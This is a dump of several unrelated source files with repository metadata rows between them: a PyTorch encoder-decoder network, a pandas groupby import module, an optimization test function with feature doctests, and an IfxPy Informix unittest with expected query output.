nn.Conv2d(1, 16, 4, 2, 1),
norm_layer(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 32, 4, 2, 1),
norm_layer(32),
nn.LeakyReLU(0.2),
nn.Conv2d(32, 64, 4, 2, 1),
norm_layer(64),
nn.LeakyReLU(0.2),
nn.Conv2d(64, 128, 4, 2, 1),
norm_layer(128),
nn.LeakyReLU(0.2),
nn.Conv2d(128, 256, 4, 2, 1),
norm_layer(256),
nn.LeakyReLU(0.2),
nn.Conv2d(256, 512, 4, 2, 1), # 512-14-4
norm_layer(512),
nn.LeakyReLU(0.2),
)
self.sides_head_center = nn.Sequential(
nn.ConvTranspose2d(512, 256, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(256),
# nn.LeakyReLU(0.2),
nn.ConvTranspose2d(256, 128, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(128),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(64),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(32),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(32, 16, 4, stride=2, padding=1, bias=False),
norm_layer(16),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(16, 16, 4, stride=2, padding=1, bias=False),
norm_layer(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 1, 3, 1, 1)
)
self.sides_head_left = nn.Sequential(
nn.Flatten(),
nn.Linear(latent_dim, 7168),
# nn.LeakyReLU(0.2),
nn.Unflatten(1, (512, 14, 1)),
nn.ConvTranspose2d(512, 256, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(256),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(256, 128, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(128),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(64),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(32),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(32, 16, 4, stride=2, padding=1, bias=False),
norm_layer(16),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(16, 16, 4, stride=2, padding=1, bias=False),
norm_layer(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 1, 3, 1, 1)
)
self.sides_head_right = nn.Sequential(
nn.Flatten(),
nn.Linear(latent_dim, 7168),
# nn.LeakyReLU(0.2),
nn.Unflatten(1, (512, 14, 1)),
nn.ConvTranspose2d(512, 256, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(256),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(256, 128, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(128),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(64),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(32),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(32, 16, 4, stride=2, padding=1, bias=False),
norm_layer(16),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(16, 16, 4, stride=2, padding=1, bias=False),
norm_layer(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 1, 3, 1, 1)
)
# self.lt = nn.Embedding(n_label, latent_dim)
def forward(self, imgs):
z_s = self.encoder(imgs)
reconsts_center = self.decode(z_s, sides='center')
reconsts_left = self.decode(z_s, sides='left')
reconsts_right = self.decode(z_s, sides='right')
reconsts = torch.cat((reconsts_left, reconsts_center, reconsts_right), 3)
return reconsts
def encode(self, imgs):
z_s = self.encoder(imgs)
return z_s
def decode(self, z_s, sides='center'):
if sides == 'right':
reconsts = self.sides_head_right(z_s)
elif sides == 'left':
reconsts = self.sides_head_left(z_s)
elif sides == 'center':
reconsts = self.sides_head_center(z_s)
else:
raise NotImplementedError
return reconsts
class ReconstructionNetwork(nn.Module):
def __init__(self, inplanes=1, planes=16,
kernel_size=4, stride=2, padding=1,
norm_layer=nn.InstanceNorm2d):
super(ReconstructionNetwork, self).__init__()
latent=14
output_padding=(1, 0)
self.latent_dim = 512*latent*2
encoder = []
x = inplanes
y = planes
for i in range(6):
encoder += [
nn.Conv2d(x, y, kernel_size, stride, padding),
norm_layer(y),
nn.LeakyReLU(0.2)]
if x == 1:
x = 16
else:
x = x*2
y = y*2
# encoder += [nn.Flatten()] + [nn.Linear(self.latent_dim, self.latent_dim*4)]
self.encoder = nn.Sequential(*encoder)
x = 512
y = 256
# decoder = [nn.Unflatten(1, (x, latent, 8))]
decoder = []
for i in range(6):
decoder += [
nn.ConvTranspose2d(x, y, kernel_size, stride, padding,\
output_padding, bias=False),
norm_layer(y),
nn.LeakyReLU(0.2)]
if i == 3:
output_padding = (0, 0)
x = x//2
if y != 16:
y = y//2
decoder += [nn.Conv2d(16, 1, 3, 1, 1)]
self.decoder = nn.Sequential(*decoder)
def forward(self, imgs):
z = self.encoder(imgs)
return self.decoder(z)
class StyleNetworkAblation(nn.Module):
def __init__(
self,
img_size,
inplanes=1,
planes=16,
kernel_size=4,
stride=2,
padding=1,
normalization='instance',
output_padding=(1, 0),
n_layers=6
):
if normalization == 'instance':
norm_layer=nn.InstanceNorm2d
else:
norm_layer=nn.BatchNorm2d
super(StyleNetworkAblation, self).__init__()
if n_layers == 6:
latent=14
if (img_size == 'linear'):
dim2 = 2
elif img_size == 'multi':
dim2 = 4
else:
raise NotImplementedError
else:
latent=7
if (img_size == 'linear'):
dim2 = 1
elif img_size == 'multi':
dim2 = 2
else:
raise NotImplementedError
self.latent_dim = 512*latent*dim2
encoder = []
x = inplanes
y = planes
for i in range(n_layers):
if i == 6:
encoder += [
nn.Conv2d(x, y, kernel_size, stride, padding),
norm_layer(y),
nn.LeakyReLU(0.2)]
else:
encoder += [
nn.Conv2d(x, y, kernel_size, stride, (1, 1)),
norm_layer(y),
nn.LeakyReLU(0.2)]
x = y
y = y*2
encoder += [nn.Flatten()]
self.encoder = nn.Sequential(*encoder)
if n_layers == 6:
x = 512
y = 256
else:
x = 1024
y = 512
decoder = [nn.Unflatten(1, (x, latent, dim2))]
decoder_style = [nn.Unflatten(1, (x, latent, dim2))]
for i in range(n_layers):
if i == 4:
output_padding = (0, 0)
decoder += [
nn.ConvTranspose2d(
x, y, kernel_size, stride, padding,\
output_padding, bias=False
),
norm_layer(y),
nn.LeakyReLU(0.2)]
decoder_style += [
nn.ConvTranspose2d(
x, y, kernel_size, stride, padding,\
output_padding, bias=False
),
norm_layer(y),
nn.LeakyReLU(0.2)
]
x = x//2
if y != 16:
y = y//2
decoder += [nn.Conv2d(16, 1, 3, 1, (1, 1))]
self.decoder = nn.Sequential(*decoder)
decoder_style += [nn.Conv2d(16, 1, 3, 1, 1)]
self.decoder_style = nn.Sequential(*decoder_style)
self.mu = nn.Embedding(1, self.latent_dim)
self.logvar = nn.Embedding(1, self.latent_dim)
self.logvar.weight.data[0] = torch.zeros(
[1, self.latent_dim], requires_grad=False)
def forward(self, imgs, real=False):
z_s = self.encode(imgs)
return self.decode(z_s, real=real)
def encode(self, imgs):
return self.encoder(imgs)
    def encode_with_style(self, imgs, real=False):
        # fix: z_s was referenced before assignment in the original
        z_s = self.encoder(imgs)
        if real:
            return z_s + self.sample(z_s.shape)
        else:
            return z_s
def sample(self, s):
std = torch.exp(self.logvar.weight[0].expand(s))
eps = torch.randn_like(std)
return eps * std + self.mu.weight[0].expand(s)
def decode(self, z_s, real=False):
if real:
return self.decoder_style(z_s + self.sample(z_s.shape))
else:
return self.decoder(z_s)
class FullNetwork(nn.Module):
def __init__(
self,
img_size,
inplanes=1,
planes=16,
kernel_size=4,
stride=2,
padding=1,
normalization='instance',
output_padding=(1, 0),
n_layers=6
):
if normalization == 'instance':
norm_layer=nn.InstanceNorm2d
else:
norm_layer=nn.BatchNorm2d
super(FullNetwork, self).__init__()
        if n_layers == 6:
            latent = 14
            if img_size == 'linear':
                dim2 = 2
            elif img_size == 'multi':
                dim2 = 4
            else:
                # fix: dim2 was otherwise left unset (NameError below);
                # mirrors the guard in StyleNetworkAblation
                raise NotImplementedError
        else:
            latent = 7
            if img_size == 'linear':
                dim2 = 1
            elif img_size == 'multi':
                dim2 = 2
            else:
                # fix: dim2 was otherwise left unset (NameError below)
                raise NotImplementedError
self.latent_dim = 512*latent*dim2
encoder = []
x = inplanes
y = planes
for i in range(n_layers):
if i == 6:
encoder += [
nn.Conv2d(x, y, kernel_size, stride, padding),
norm_layer(y),
nn.LeakyReLU(0.2)]
else:
encoder += [
nn.Conv2d(x, y, kernel_size, stride, (1, 1)),
norm_layer(y),
nn.LeakyReLU(0.2)]
x = y
y = y*2
encoder += [nn.Flatten()]
self.encoder = nn.Sequential(*encoder)
if n_layers == 6:
x = 512
y = 256
else:
x = 1024
y = 512
decoder = [nn.Unflatten(1, (x, latent, dim2))]
decoder_style = [nn.Unflatten(1, (x, latent, dim2))]
for i in range(n_layers):
if i == 4:
output_padding = (0, 0)
decoder += [
nn.ConvTranspose2d(
x, y, kernel_size, stride, padding,\
output_padding, bias=False
),
norm_layer(y),
nn.LeakyReLU(0.2)]
decoder_style += [
nn.ConvTranspose2d(
x, y, kernel_size, stride, padding,\
output_padding, bias=False
),
norm_layer(y),
nn.LeakyReLU(0.2)
]
x = x//2
if y != 16:
y = y//2
decoder += [nn.Conv2d(16, 1, 3, 1, (1, 1))]
self.decoder = nn.Sequential(*decoder)
decoder_style += [nn.Conv2d(16, 1, 3, 1, 1)]
self.decoder_style = nn.Sequential(*decoder_style)
self.mu = nn.Embedding(1, self.latent_dim)
self.logvar = nn.Embedding(1, self.latent_dim)
self.logvar.weight.data[0] = torch.zeros(
[1, self.latent_dim], requires_grad=False)
self.sides_head_left = nn.Sequential(
nn.Flatten(),
nn.Linear(self.latent_dim, 7168),
nn.LeakyReLU(0.2),
nn.Unflatten(1, (512, 14, 1)),
nn.ConvTranspose2d(512, 256, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(256),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(256, 128, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(128),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(64),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(32),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(32, 16, 4, stride=2, padding=1, bias=False),
norm_layer(16),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(16, 16, 4, stride=2, padding=1, bias=False),
norm_layer(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 1, 3, 1, 1)
)
self.sides_head_right = nn.Sequential(
nn.Flatten(),
nn.Linear(self.latent_dim, 7168),
nn.LeakyReLU(0.2),
nn.Unflatten(1, (512, 14, 1)),
nn.ConvTranspose2d(512, 256, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(256),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(256, 128, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(128),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(64),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1,
output_padding=(1, 0), bias=False),
norm_layer(32),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(32, 16, 4, stride=2, padding=1, bias=False),
norm_layer(16),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(16, 16, 4, stride=2, padding=1, bias=False),
norm_layer(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 1, 3, 1, 1)
)
def forward(self, imgs, real=False, full=False):
z_s = self.encode(imgs)
if full:
reconsts_center = self.decode(z_s, real=real, sides='center').clone().detach()
reconsts_left = self.decode(z_s, sides='left').clone().detach()
reconsts_right = self.decode(z_s, sides='right').clone().detach()
return torch.cat((reconsts_left, reconsts_center, reconsts_right), 3)
else:
return self.decode(z_s, real=real, sides='center')
def encode(self, imgs):
return self.encoder(imgs)
    def encode_with_style(self, imgs, real=False):
        # fix: z_s was referenced before assignment in the original
        z_s = self.encoder(imgs)
        if real:
            return z_s + self.sample(z_s.shape)
        else:
            return z_s
def sample(self, s):
std = torch.exp(self.logvar.weight[0].expand(s))
eps = torch.randn_like(std)
return eps * std + self.mu.weight[0].expand(s)
def decode(self, z_s, real=False, sides='center'):
if sides == 'center':
if real:
# return self.decode(z_s + self.sample(z_s.shape))
return self.decoder_style(z_s + self.sample(z_s.shape))
else:
return self.decoder(z_s)
        if sides == 'right':
            return self.sides_head_right(z_s)
        elif sides == 'left':
            return self.sides_head_left(z_s)
        else:
            # fix: unknown sides silently returned None before
            raise NotImplementedError
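# --- Editorial smoke test (not part of the original file) ---
# The input size is an assumption reverse-engineered from the layer
# arithmetic: with img_size='linear', six stride-2 convs map
# (N, 1, 956, 128) down to a 512 x 14 x 2 latent (latent_dim = 14336), and
# the transposed-conv decoder inverts it exactly.
if __name__ == "__main__":
    net = StyleNetwork(img_size='linear')
    x = torch.randn(2, 1, 956, 128)
    z = net.encode(x)
    assert z.shape == (2, 14336)
    recon = net.decode(z)
    assert recon.shape == x.shape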
| 32.833871
| 97
| 0.489537
| 4,740
| 40,714
| 4.075738
| 0.043038
| 0.049692
| 0.07019
| 0.076039
| 0.888141
| 0.875925
| 0.862001
| 0.843574
| 0.825612
| 0.811377
| 0
| 0.081272
| 0.389227
| 40,714
| 1,239
| 98
| 32.860371
| 0.695621
| 0.029941
| 0
| 0.846392
| 0
| 0
| 0.007302
| 0
| 0
| 0
| 0
| 0.000807
| 0
| 1
| 0.049485
| false
| 0
| 0.005155
| 0.009278
| 0.114433
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c15a5ebfe0f22706a8eb0f17fc5fa6570af6a61
| 231
|
py
|
Python
|
App/dist/coffeegrindsize.app/Contents/Resources/lib/python3.7/pandas/core/groupby/__init__.py
|
tanerqy/coffeegrindsize
|
57f6c48213afda2704478b3fc2d0749332ca9d0e
|
[
"MIT"
] | 6,989
|
2017-07-18T06:23:18.000Z
|
2022-03-31T15:58:36.000Z
|
Library/lib/python3.7/site-packages/pandas-0.24.2-py3.7-macosx-10.9-x86_64.egg/pandas/core/groupby/__init__.py
|
gengyong/Carnets
|
8930a14f69360d4db115a85ff9e0f6efa80fa2e7
|
[
"BSD-3-Clause"
] | 1,978
|
2017-07-18T09:17:58.000Z
|
2022-03-31T14:28:43.000Z
|
Library/lib/python3.7/site-packages/pandas-0.24.2-py3.7-macosx-10.9-x86_64.egg/pandas/core/groupby/__init__.py
|
gengyong/Carnets
|
8930a14f69360d4db115a85ff9e0f6efa80fa2e7
|
[
"BSD-3-Clause"
] | 1,228
|
2017-07-18T09:03:13.000Z
|
2022-03-29T05:57:40.000Z
|
from pandas.core.groupby.groupby import GroupBy # noqa: F401
from pandas.core.groupby.generic import ( # noqa: F401
SeriesGroupBy, DataFrameGroupBy, PanelGroupBy)
from pandas.core.groupby.grouper import Grouper # noqa: F401
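# Editorial note (not part of the original file): PanelGroupBy only exists in
# the pandas 0.24.x line vendored above; pandas 0.25 removed Panel and its
# groupby support, so this re-export fails to import on newer versions.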
| 46.2
| 61
| 0.78355
| 29
| 231
| 6.241379
| 0.413793
| 0.165746
| 0.232044
| 0.348066
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045
| 0.134199
| 231
| 4
| 62
| 57.75
| 0.86
| 0.138528
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9c3368b534a08b87f1f3d1cee465600232dc6fc4
| 5,725
|
py
|
Python
|
MDAF/TestFunctions/Wayburn.py
|
ejeanboris/MDAF_COMPLETE
|
e99c9762ea7304acc0a6795d33a55449a9800d89
|
[
"CC0-1.0"
] | 1
|
2020-12-30T23:04:51.000Z
|
2020-12-30T23:04:51.000Z
|
MDAF/TestFunctions/Wayburn.py
|
ejeanboris/MDAF_COMPLETE
|
e99c9762ea7304acc0a6795d33a55449a9800d89
|
[
"CC0-1.0"
] | null | null | null |
MDAF/TestFunctions/Wayburn.py
|
ejeanboris/MDAF_COMPLETE
|
e99c9762ea7304acc0a6795d33a55449a9800d89
|
[
"CC0-1.0"
] | null | null | null |
import math
def main(args):
'''
>>> main([1,2])<0.001
True
#_# dimmensions: 2
#_# upper: 100
#_# lower: -100
#_# minimum: [1,2]
#_# opti: 0
#_# cm_angle: array([[ 16.51016476], [ 2.57287474], [ 17.61177277], [ 2.41471473], [142.5140382 ], [ 28.5868278 ], [ 0.26952628], [ 0.39099627], [ 0. ], [ 0.369 ]])
#_# cm_conv: array([[0.25 ], [0.09615385], [0.76923077], [0.23076923], [0. ], [0.064 ]])
#_# cm_grad: array([[0.66097771], [0.08800919], [0. ], [0.164 ]])
#_# ela_conv: array([[ 1.0000000e+00], [ 0.0000000e+00], [-5.7208316e+22], [ 5.7208316e+22], [ 1.0000000e+03], [ 6.5400000e-01]])
#_# ela_curv: array([[9.80882101e+07], [3.16831680e+16], [9.56909760e+21], [4.39318384e+19], [4.65778139e+21], [1.08965948e+23], [2.20727784e+22], [0.00000000e+00], [1.09553821e+00], [2.16967897e+02], [6.96768470e+06], [5.52099617e+03], [3.60451882e+04], [1.29249630e+09], [9.18573153e+07], [1.00000000e-02], [1.20728457e+00], [1.26787937e+03], [6.72779142e+26], [1.64545038e+04], [8.27264290e+04], [1.33092866e+29], [9.41113552e+27], [0.00000000e+00], [8.38800000e+03], [9.67900000e+00]])
#_# ela_distr: array([[ 2.95537956], [ 8.41879344], [16. ], [ 0. ], [ 0.26 ]])
#_# ela_local: array([[9.00000000e+01], [9.00000000e-01], [1.60765038e-03], [3.23996011e-01], [1.00000000e-02], [1.11235955e-02], [1.00000000e-02], [2.55000000e+02], [3.38750000e+02], [4.20500000e+02], [4.15000000e+02], [4.75000000e+02], [1.28500000e+03], [1.25582481e+02], [4.21400000e+04], [1.53870000e+01]])
#_# ela_meta: array([[-5.84568182e-03], [ 7.68635555e+22], [ 5.31065144e+18], [ 4.88899306e+19], [ 9.20601382e+00], [-6.16929073e-03], [ 5.52437887e-01], [ 2.37186991e+01], [ 5.55065780e-01], [ 0.00000000e+00], [ 1.30000000e-02]])
#_# basic: array([[ 2.00000000e+00], [ 5.00000000e+02], [-1.00000000e+02], [-1.00000000e+02], [ 1.00000000e+02], [ 1.00000000e+02], [ 3.10691301e+07], [ 9.80481050e+23], [ 6.00000000e+00], [ 6.00000000e+00], [ 3.60000000e+01], [ 3.60000000e+01], [ 1.00000000e+00], [ 0.00000000e+00], [ 1.00000000e-03]])
#_# disp: array([[ 1.79472172e-01], [ 3.04971872e-01], [ 4.35404768e-01], [ 6.95890946e-01], [ 1.59018558e-01], [ 2.71378354e-01], [ 3.84165922e-01], [ 6.16352427e-01], [-8.57228823e+01], [-7.26115707e+01], [-5.89848741e+01], [-3.17711402e+01], [-8.62321072e+01], [-7.47110183e+01], [-6.31460666e+01], [-3.93382505e+01], [ 0.00000000e+00], [ 1.20000000e-02]])
#_# limo: array([[ 2.36717207e+20], [ 4.07457578e-02], [ 7.98525673e+21], [ 1.14416298e+22], [ 1.19946513e-01], [-3.26380292e-02], [ 2.69245754e+01], [ 6.64423242e+01], [ 1.19653395e+01], [ 6.08626247e+00], [ 7.56713964e+21], [ 5.82114762e-01], [ 0.00000000e+00], [ 5.90000000e-02]])
#_# nbc: array([[ 0.88092555], [ 0.92477452], [ 0.64327624], [ 0.11440441], [-0.24261939], [ 0. ], [ 0.044 ]])
#_# pca: array([[1. ], [1. ], [0.33333333], [1. ], [0.51039617], [0.51039564], [1. ], [0.34226913], [0. ], [0.003 ]])
#_# gcm: array([[1. ], [0.02777778], [0.97222222], [0. ], [1. ], [1. ], [1. ], [1. ], [ nan], [1. ], [1. ], [1. ], [1. ], [ nan], [1. ], [1. ], [1. ], [1. ], [1. ], [ nan], [1. ], [1. ], [0.02777778], [0. ], [0.037 ], [3. ], [0.08333333], [0.91666667], [0.83333333], [0.2179862 ], [0.33333333], [0.37721563], [0.40479817], [0.10084106], [0.05555556], [0.05555556], [0.05555556], [0.05555556], [0. ], [0.16666667], [0.16666667], [0.33333333], [0.33333333], [0.5 ], [0.16666667], [1. ], [0.40479817], [0.02777778], [0. ], [0.043 ], [1. ], [0.02777778], [0.97222222], [0. ], [1. ], [1. ], [1. ], [1. ], [ nan], [1. ], [1. ], [1. ], [1. ], [ nan], [1. ], [1. ], [1. ], [1. ], [1. ], [ nan], [1. ], [1. ], [0.02777778], [0. ], [0.046 ]])
#_# ic: array([[4.67671036e-01], [ nan], [9.97697764e+13], [1.50000000e+01], [3.69477912e-01], [0.00000000e+00], [3.74000000e-01]])
#_# Represented: 1
'''
return (args[0]**6 + args[1]**4 - 17)**2 + (2*args[0] + args[1] - 4)**2
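# Editorial check (not in the original file): at (1, 2) both squared residuals
# vanish, since 1**6 + 2**4 - 17 == 0 and 2*1 + 2 - 4 == 0, so
# main([1, 2]) == 0, matching '#_# opti: 0' and the doctest above.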
if __name__ == "__main__":
import doctest
doctest.testmod()
| 146.794872
| 1,511
| 0.39441
| 601
| 5,725
| 3.695507
| 0.334443
| 0.020711
| 0.01891
| 0.014408
| 0.106258
| 0.092751
| 0.092751
| 0.076092
| 0.076092
| 0.076092
| 0
| 0.519758
| 0.39441
| 5,725
| 38
| 1,512
| 150.657895
| 0.120854
| 0.973974
| 0
| 0
| 0
| 0
| 0.044693
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9c4b40af716d60ff1006f427bbb9d15ca53e1a06
| 6,083
|
py
|
Python
|
IfxPy/tests/test_161_FetchBothNestedSelects_01.py
|
jaimundada/IfxPy
|
e6941d77051933dfe6affd3b096ea6d8f485ae9b
|
[
"Apache-2.0"
] | 39
|
2017-09-25T00:10:23.000Z
|
2022-02-10T22:03:36.000Z
|
IfxPy/tests/test_161_FetchBothNestedSelects_01.py
|
jaimundada/IfxPy
|
e6941d77051933dfe6affd3b096ea6d8f485ae9b
|
[
"Apache-2.0"
] | 58
|
2018-05-11T09:45:45.000Z
|
2022-03-10T10:27:01.000Z
|
IfxPy/tests/test_161_FetchBothNestedSelects_01.py
|
jaimundada/IfxPy
|
e6941d77051933dfe6affd3b096ea6d8f485ae9b
|
[
"Apache-2.0"
] | 22
|
2018-02-02T12:41:18.000Z
|
2022-02-24T14:29:17.000Z
|
#
#
#
import unittest, sys
import IfxPy
import config
from testfunctions import IfxPyTestFunctions
class IfxPyTestCase(unittest.TestCase):
def test_161_FetchBothNestedSelects_01(self):
obj = IfxPyTestFunctions()
obj.assert_expect(self.run_test_161)
def run_test_161(self):
conn = IfxPy.connect(config.ConnStr, config.user, config.password)
server = IfxPy.server_info( conn )
if (server.DBMS_NAME[0:3] == 'Inf'):
op = {IfxPy.ATTR_CASE: IfxPy.CASE_UPPER}
IfxPy.set_option(conn, op, 1)
result = IfxPy.exec_immediate(conn, "select * from emp_act order by projno desc")
row = IfxPy.fetch_both(result)
count = 1
while ( row ):
print("Record",count,": %6s %-6s %3d %9s %10s %10s %6s " % (row[0], row[1], row[2], row['EMPTIME'], row['EMSTDATE'], row['EMENDATE'], row[0]))
result2 = IfxPy.exec_immediate(conn,"select * from employee where employee.empno='" + row['EMPNO'] + "'")
row2 = IfxPy.fetch_both(result2)
if row2:
print(">>%s,%s,%s,%s,%s,%s,%s" % (row2['EMPNO'], row2['FIRSTNME'],row2['MIDINIT'], row2[3], row2[3], row2[5], row2[6]))
count = count + 1
if (count > 10):
break
row = IfxPy.fetch_both(result)
#__END__
#__LUW_EXPECTED__
#Record 1 : 000020 PL2100 30 1.00 1982-01-01 1982-09-15 000020
#>>000020,MICHAEL,L,THOMPSON,THOMPSON,3476,1973-10-10
#Record 2 : 000020 PL2100 30 1.00 1982-01-01 1982-09-15 000020
#>>000020,MICHAEL,L,THOMPSON,THOMPSON,3476,1973-10-10
#Record 3 : 000340 OP2013 140 0.50 1982-01-01 1983-02-01 000340
#>>000340,JASON,R,GOUNOT,GOUNOT,5698,1947-05-05
#Record 4 : 000340 OP2013 170 0.50 1982-01-01 1983-02-01 000340
#>>000340,JASON,R,GOUNOT,GOUNOT,5698,1947-05-05
#Record 5 : 000330 OP2012 140 0.25 1982-01-01 1983-02-01 000330
#>>000330,WING, ,LEE,LEE,2103,1976-02-23
#Record 6 : 000330 OP2012 160 0.75 1982-01-01 1983-02-01 000330
#>>000330,WING, ,LEE,LEE,2103,1976-02-23
#Record 7 : 000320 OP2011 140 0.75 1982-01-01 1983-02-01 000320
#>>000320,RAMLAL,V,MEHTA,MEHTA,9990,1965-07-07
#Record 8 : 000320 OP2011 150 0.25 1982-01-01 1983-02-01 000320
#>>000320,RAMLAL,V,MEHTA,MEHTA,9990,1965-07-07
#Record 9 : 000050 OP2010 10 0.75 1982-01-01 1983-02-01 000050
#>>000050,JOHN,B,GEYER,GEYER,6789,1949-08-17
#Record 10 : 000100 OP2010 10 1.00 1982-01-01 1983-02-01 000100
#>>000100,THEODORE,Q,SPENSER,SPENSER,0972,1980-06-19
#__ZOS_EXPECTED__
#Record 1 : 000020 PL2100 30 1.00 1982-01-01 1982-09-15 000020
#>>000020,MICHAEL,L,THOMPSON,THOMPSON,3476,1973-10-10
#Record 2 : 000020 PL2100 30 1.00 1982-01-01 1982-09-15 000020
#>>000020,MICHAEL,L,THOMPSON,THOMPSON,3476,1973-10-10
#Record 3 : 000340 OP2013 170 0.50 1982-01-01 1983-02-01 000340
#>>000340,JASON,R,GOUNOT,GOUNOT,5698,1947-05-05
#Record 4 : 000340 OP2013 140 0.50 1982-01-01 1983-02-01 000340
#>>000340,JASON,R,GOUNOT,GOUNOT,5698,1947-05-05
#Record 5 : 000330 OP2012 160 0.75 1982-01-01 1983-02-01 000330
#>>000330,WING, ,LEE,LEE,2103,1976-02-23
#Record 6 : 000330 OP2012 140 0.25 1982-01-01 1983-02-01 000330
#>>000330,WING, ,LEE,LEE,2103,1976-02-23
#Record 7 : 000320 OP2011 150 0.25 1982-01-01 1983-02-01 000320
#>>000320,RAMLAL,V,MEHTA,MEHTA,9990,1965-07-07
#Record 8 : 000320 OP2011 140 0.75 1982-01-01 1983-02-01 000320
#>>000320,RAMLAL,V,MEHTA,MEHTA,9990,1965-07-07
#Record 9 : 000100 OP2010 10 1.00 1982-01-01 1983-02-01 000100
#>>000100,THEODORE,Q,SPENSER,SPENSER,0972,1980-06-19
#Record 10 : 000050 OP2010 10 0.75 1982-01-01 1983-02-01 000050
#>>000050,JOHN,B,GEYER,GEYER,6789,1949-08-17
#__SYSTEMI_EXPECTED__
#Record 1 : 000020 PL2100 30 1.00 1982-01-01 1982-09-15 000020
#>>000020,MICHAEL,L,THOMPSON,THOMPSON,3476,1973-10-10
#Record 2 : 000020 PL2100 30 1.00 1982-01-01 1982-09-15 000020
#>>000020,MICHAEL,L,THOMPSON,THOMPSON,3476,1973-10-10
#Record 3 : 000340 OP2013 140 0.50 1982-01-01 1983-02-01 000340
#>>000340,JASON,R,GOUNOT,GOUNOT,5698,1947-05-05
#Record 4 : 000340 OP2013 170 0.50 1982-01-01 1983-02-01 000340
#>>000340,JASON,R,GOUNOT,GOUNOT,5698,1947-05-05
#Record 5 : 000330 OP2012 140 0.25 1982-01-01 1983-02-01 000330
#>>000330,WING, ,LEE,LEE,2103,1976-02-23
#Record 6 : 000330 OP2012 160 0.75 1982-01-01 1983-02-01 000330
#>>000330,WING, ,LEE,LEE,2103,1976-02-23
#Record 7 : 000320 OP2011 140 0.75 1982-01-01 1983-02-01 000320
#>>000320,RAMLAL,V,MEHTA,MEHTA,9990,1965-07-07
#Record 8 : 000320 OP2011 150 0.25 1982-01-01 1983-02-01 000320
#>>000320,RAMLAL,V,MEHTA,MEHTA,9990,1965-07-07
#Record 9 : 000050 OP2010 10 0.75 1982-01-01 1983-02-01 000050
#>>000050,JOHN,B,GEYER,GEYER,6789,1949-08-17
#Record 10 : 000100 OP2010 10 1.00 1982-01-01 1983-02-01 000100
#>>000100,THEODORE,Q,SPENSER,SPENSER,0972,1980-06-19
